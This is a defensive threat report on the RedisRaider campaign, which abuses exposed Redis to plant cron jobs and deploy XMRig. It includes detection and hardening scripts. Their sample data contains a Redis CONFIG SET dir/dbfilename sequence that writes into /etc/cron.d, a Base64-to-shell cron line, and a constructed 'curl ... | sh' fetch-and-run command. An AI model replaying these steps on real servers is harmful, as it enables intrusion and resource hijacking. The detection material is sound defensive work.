Full Report
Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers. The malicious activity has been codenamed RedisRaider by Datadog Security Labs. "RedisRaider aggressively scans randomized portions of the IPv4 space and uses legitimate Redis configuration commands to execute malicious cron jobs on vulnerable systems,"
Analysis Summary
# Tool/Technique: RedisRaider (Cryptojacking Campaign)
## Overview
RedisRaider is a cryptojacking campaign observed targeting publicly accessible Redis servers running on Linux hosts. The campaign abuses legitimate Redis configuration commands to execute malicious cron jobs, ultimately deploying a Go-based payload that installs and executes the XMRig cryptocurrency miner. The infrastructure also supports a web-based Monero miner for diversified revenue.
## Technical Details
- Type: Malware Campaign / Tool Usage
- Platform: Linux
- Capabilities: Scanning randomized IPv4 ranges for Redis, abusing `CONFIG` to drop a database snapshot into `/etc/cron.d` for cron-based persistence, fetching and running a remote payload, deploying the XMRig miner, propagating to further Redis instances, and operating a web-based miner.
- First Seen: May 20, 2025 (Based on article date)
## MITRE ATT&CK Mapping
- **TA0043 - Reconnaissance**
- T1595.001 - Active Scanning: Scanning IP Blocks (randomized IPv4 scanning for Redis)
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (internet-exposed Redis accepting commands without authentication)
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell (cron runs a Base64-decoded shell script)
- **TA0003 - Persistence**
- T1053.003 - Scheduled Task/Job: Cron (database snapshot written to `/etc/cron.d/apache`)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Base64-encoded stage-1 script; Base64 is plain encoding, not steganography)
- T1070 - Indicator Removal (short key TTLs so the injected keys expire)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (download of the Go dropper and XMRig)
- T1071.001 - Application Layer Protocol: Web Protocols (assumed; the article does not state the download protocol)
- **TA0040 - Impact**
- T1496 - Resource Hijacking (XMRig on the host plus a browser-based Monero miner)
## Functionality
### Core Capabilities
- **Discovery:** Aggressively scans randomized portions of the IPv4 space for Redis instances that accept commands without authentication.
- **Target Validation:** Sends the `INFO` command and reads the server fields to confirm the target runs Linux before proceeding.
- **Persistence Establishment:** Stores a crontab line (padded with newlines) as the value of a key via `SET`, then uses `CONFIG SET dir /etc/cron.d` and `CONFIG SET dbfilename apache` so that the next database save (`SAVE`) writes the RDB snapshot, injected line included, to `/etc/cron.d/apache`. cron skips the binary RDB bytes it cannot parse and runs the embedded job. This only works because the exposed Redis process has write access to `/etc/cron.d`, which in practice means it runs as root.
- **Payload Delivery:** The scheduled job decodes a Base64-encoded shell script and runs it; that script downloads the primary RedisRaider binary.
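The command sequence above is visible on the server side through Redis `MONITOR` (or any proxy that logs commands). The following detector is an added example, not code from the Datadog report or from the campaign: it parses constructed sample MONITOR lines (documentation-range addresses and hypothetical client ports) and scores, per client, a `SET` of a crontab-shaped value, `CONFIG SET dir` into a sensitive directory, `CONFIG SET dbfilename`, and a subsequent `SAVE`/`BGSAVE`. The sensitive-directory list deliberately goes beyond `/etc/cron.d` to the other well-known targets of the same dump trick (cron spools, `~/.ssh`, web roots).

```python
import re
from collections import defaultdict

# Paths an attacker points "CONFIG SET dir" at so that the next RDB save lands
# somewhere a system service will parse it (cron, sshd, a web server).
SENSITIVE_DIRS = ("/etc/cron", "/var/spool/cron", "/root/.ssh", "/home/", "/var/www")

# Shape of one MONITOR line: <unix_ts> [<db> <ip:port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\S+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# A crontab line as found in /etc/cron.d: five schedule fields, then a user name.
CRON_LINE_RE = re.compile(r'(?m)^\s*(?:\*(?:/\d+)?|\d+)(?:\s+(?:\*(?:/\d+)?|\d+)){4}\s+\S+')

# Constructed MONITOR capture for this example (not real campaign traffic): one
# scanner walks through the dump-to-cron sequence, one legitimate client reads a key.
SAMPLE_MONITOR = """\
1747699200.101 [0 203.0.113.7:41022] "INFO"
1747699200.202 [0 203.0.113.7:41022] "SET" "x" "\\n\\n*/1 * * * * root echo aGVsbG8= | base64 -d | sh\\n\\n"
1747699200.303 [0 203.0.113.7:41022] "CONFIG" "SET" "dir" "/etc/cron.d"
1747699200.404 [0 203.0.113.7:41022] "CONFIG" "SET" "dbfilename" "apache"
1747699200.505 [0 203.0.113.7:41022] "SAVE"
1747699201.000 [0 10.0.0.5:50000] "GET" "session:42"
1747699201.100 [0 10.0.0.5:50000] "CONFIG" "GET" "maxmemory"
"""


def parse_monitor_line(line):
    """Return (timestamp, client, [command, args...]) for one MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = []
    for raw in ARG_RE.findall(m.group("cmd")):
        try:  # MONITOR prints values with backslash escapes; undo them
            args.append(raw.encode().decode("unicode_escape"))
        except UnicodeDecodeError:
            args.append(raw)
    return m.group("ts"), m.group("client"), args


def alert(ts, client, severity, reason):
    return {"ts": ts, "client": client, "severity": severity, "reason": reason}


def analyze_monitor(text):
    """Walk MONITOR output and return alerts for the dump-to-cron sequence, keeping
    dir/dbfilename per client so a later SAVE/BGSAVE can be scored as critical."""
    alerts = []
    state = defaultdict(dict)
    for line in text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, args = parsed
        cmd = args[0].upper()
        sub = args[1].upper() if len(args) > 1 else ""
        if cmd == "CONFIG" and sub == "SET" and len(args) >= 4:
            key, value = args[2].lower(), args[3]
            if key == "dir":
                state[client]["dir"] = value
                if value.startswith(SENSITIVE_DIRS):
                    alerts.append(alert(ts, client, "high", f"CONFIG SET dir {value}"))
            elif key == "dbfilename":
                state[client]["dbfilename"] = value
                alerts.append(alert(ts, client, "medium", f"CONFIG SET dbfilename {value}"))
        elif cmd == "SET" and len(args) >= 3 and CRON_LINE_RE.search(args[2]):
            alerts.append(alert(ts, client, "medium", "SET value contains a crontab line"))
        elif cmd in ("SAVE", "BGSAVE"):
            st = state[client]
            if st.get("dir", "").startswith(SENSITIVE_DIRS):
                alerts.append(alert(ts, client, "critical",
                    f"{cmd} will write {st.get('dbfilename', 'dump.rdb')} into {st['dir']}"))
    return alerts


if __name__ == "__main__":
    for a in analyze_monitor(SAMPLE_MONITOR):
        print(f"{a['severity']:8} {a['client']:22} {a['reason']}")
```

`MONITOR` costs throughput on a busy instance, so in production the same logic is better fed from a command-logging proxy or from `CONFIG`/`SAVE` entries in the slow log; the per-client state is what turns four individually explainable commands into one high-confidence sequence.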
### Advanced Features
- **Multi-stage Infection:** The primary Go-based payload acts as a dropper for the XMRig miner.
- **Propagation:** The payload is designed to propagate the malware to other vulnerable Redis instances, expanding its reach.
- **Anti-Forensics:** Sets short TTLs on the keys it writes so they expire on their own, and changes database configuration so that responders have as little residue as possible to examine.
- **Revenue Diversification:** Runs both server-side cryptojacking (XMRig) and hosts a web-based Monero miner.
## Indicators of Compromise
- File Hashes: [None provided in the context]
- File Names: "apache" (database/cron job file in `/etc/cron.d`)
- Registry Keys: [N/A for Linux persistence mechanism described]
- Network Indicators: The remote host serving the RedisRaider binary and the mining-pool endpoints used by XMRig (not reproduced in the article).
- Behavioral Indicators: Use of legitimate Redis commands (`INFO`, `SET`, `CONFIG SET dir`, `CONFIG SET dbfilename`, `SAVE`) to land a database snapshot in `/etc/cron.d`; a cron job that decodes a Base64 blob and pipes it to a shell.
## Associated Threat Actors
- Threat actors conducting cryptojacking campaigns targeting Redis. (No specific named group provided, but associated with the "RedisRaider" campaign.)
## Detection Methods
- Signature-based detection: Hash or YARA rules for the Go dropper and the XMRig build it deploys, once samples are available (the article provides no hashes).
- Behavioral detection: On the Redis side, `CONFIG SET dir` or `CONFIG SET dbfilename` from any client that is not an administrator, especially followed by `SAVE`/`BGSAVE`. On the host, new files in `/etc/cron.d` that begin with the RDB magic `REDIS` or contain non-printable bytes, cron-spawned `sh` processes that decode Base64 and fetch from the internet, and XMRig process names, sustained CPU saturation or connections to mining pools.
- YARA rules: [Not provided in the context]
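Host-side triage of `/etc/cron.d`, added here as an example (not the report's code): a file dropped by a Redis save starts with the RDB magic `REDIS`, and the job line inside it carries the Base64 stage described above. The sample file contents, the stage-1 script and the URL in it are constructed for the example.

```python
import base64
import re

RDB_MAGIC = b"REDIS"
# "echo <base64> | base64 -d | sh": the stage-1 shape described for this campaign.
B64_PIPE_RE = re.compile(
    rb"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
# A download command with an http(s) URL, in a cron line or a decoded stage.
DOWNLOAD_RE = re.compile(rb"\b(?:curl|wget)\b[^\n]*?https?://[^\s|'\"]+")


def triage_cron_entry(data):
    """Return (kind, detail) findings for the bytes of one /etc/cron.d file."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append(("rdb_dump", "starts with Redis RDB magic %r" % data[:9]))
    for m in B64_PIPE_RE.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            findings.append(("b64_pipe_to_shell", "undecodable base64 payload"))
            continue
        findings.append(("b64_pipe_to_shell", decoded.decode("utf-8", "replace")))
        hit = DOWNLOAD_RE.search(decoded)
        if hit:
            findings.append(("remote_download", hit.group(0).decode("utf-8", "replace")))
    hit = DOWNLOAD_RE.search(data)  # unencoded download straight in the cron line
    if hit:
        findings.append(("remote_download", hit.group(0).decode("utf-8", "replace")))
    return findings


def triage_cron_dir(entries):
    """entries: {filename: bytes}, as read from /etc/cron.d. Returns {filename: findings}."""
    return {name: triage_cron_entry(data) for name, data in entries.items()}


# Constructed sample of what a Redis SAVE leaves behind: RDB header bytes wrapping the
# injected key value. The stage-1 script and its documentation-range URL are invented.
STAGE1 = b"curl -fsSL http://203.0.113.9/x.sh | sh"
CRON_LINE = b"\n\n*/1 * * * * root echo " + base64.b64encode(STAGE1) + b" | base64 -d | sh\n\n"
FAKE_APACHE = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\x00\x01x"
               + bytes([len(CRON_LINE)]) + CRON_LINE + b"\xff" + bytes(8))
BENIGN_SYSSTAT = (b"# /etc/cron.d/sysstat\n"
                  b"5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n")
SAMPLE_CRON_D = {"apache": FAKE_APACHE, "sysstat": BENIGN_SYSSTAT}


if __name__ == "__main__":
    import os
    live = {f: open(os.path.join("/etc/cron.d", f), "rb").read()
            for f in os.listdir("/etc/cron.d")} if os.path.isdir("/etc/cron.d") else {}
    for name, findings in triage_cron_dir(live or SAMPLE_CRON_D).items():
        for kind, detail in findings:
            print(f"{name}: {kind}: {detail}")
```

The decoded stage is reported verbatim so the analyst sees the download URL without running anything; on a live host the script reads the real `/etc/cron.d` and falls back to the constructed sample otherwise.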
## Mitigation Strategies
- **Prevention measures:** Bind Redis to localhost or an internal interface only, keep `protected-mode yes`, and never expose port 6379 to the internet; if remote clients must connect, require authentication (`requirepass` or, on Redis 6+, ACL users) and restrict reachability with a firewall.
- **Hardening recommendations:** Remove the primitive the campaign relies on: disable or rename `CONFIG` (`rename-command CONFIG ""`) or deny it to application users via ACLs (`-@dangerous`), and on Redis 7+ leave `enable-protected-configs no` so `dir` and `dbfilename` cannot be changed at runtime. Run Redis as an unprivileged user that cannot write to `/etc/cron.d`, `/root/.ssh` or web roots, which defeats the dump-to-file trick even if a client gets in. Review `/etc/cron.d` for unexpected entries (the "apache" file here) and alert on new files there. Redis has no shell-execution feature to disable; the risk is entirely in reachable configuration commands plus filesystem write access.
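A configuration audit for the settings above, added here as an example (not from the article or from the Redis project). The three `redis.conf` fragments are constructed: an exposed instance, one hardened with `requirepass` and a renamed `CONFIG`, and one relying on Redis 6+ ACLs. `enable-protected-configs` exists from Redis 7.0; on older versions that check simply never fires.

```python
import shlex


def parse_redis_conf(text):
    """Parse redis.conf lines into (directive, args). Comments and blanks are dropped;
    repeated directives (user, rename-command) are kept in order."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_conf(text):
    """Return a list of problems; an empty list means every check passed."""
    cfg = parse_redis_conf(text)
    vals = lambda name: [a for d, a in cfg if d == name]
    last = lambda name, default=None: (vals(name) or [default])[-1]
    problems = []

    bind = last("bind")  # absent bind means Redis listens on every interface
    if bind is None or any(a.lstrip("-") in ("0.0.0.0", "::", "*") for a in bind):
        problems.append("bind: reachable on all interfaces; use 'bind 127.0.0.1 -::1' or an internal address")
    if last("protected-mode", ["yes"])[0].lower() != "yes":
        problems.append("protected-mode no: unauthenticated remote clients are accepted")

    users = vals("user")
    has_auth = (last("requirepass") is not None or last("aclfile") is not None
                or any(any(t.startswith(">") for t in u) for u in users))
    if not has_auth:
        problems.append("no requirepass, ACL password or aclfile: anyone who can connect is admin")

    renamed = {a[0].upper(): a[1] for a in vals("rename-command") if len(a) == 2}
    acl_blocks_config = any(any(t.lower() in ("-config", "-@dangerous", "-@admin") for t in u)
                            for u in users)
    if renamed.get("CONFIG") != "" and not acl_blocks_config:
        problems.append('CONFIG reachable: rename-command CONFIG "" or deny it via ACL (-@dangerous)')
    if last("enable-protected-configs", ["no"])[0].lower() == "yes":
        problems.append("enable-protected-configs yes: CONFIG SET dir/dbfilename allowed at runtime (Redis 7+)")
    return problems


# Constructed fragments (hypothetical values, not copied from any real deployment).
WEAK_CONF = """\
# exposed instance of the kind the campaign scans for
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
rename-command DEBUG ""
enable-protected-configs no
dir /var/lib/redis
dbfilename dump.rdb
"""

ACL_CONF = """\
bind 10.0.0.5
protected-mode yes
user default off
user app on >replace-with-app-secret ~app:* &* +@all -@dangerous
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF), ("acl", ACL_CONF)):
        print(label, audit_redis_conf(conf) or "ok")
```

One thing no `redis.conf` directive can express is the process identity: check the service unit (`User=redis` under systemd) as well, since a non-root Redis cannot create `/etc/cron.d/apache` no matter what `CONFIG SET dir` says.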
## Related Tools/Techniques
- XMRig Miner (The ultimate payload executed)
- Cryptojacking techniques exploiting common misconfigurations (e.g., exposed databases, insecure services).
- BAV2ROPC (mentioned elsewhere in the same article in connection with Entra ID abuse; not part of the RedisRaider campaign).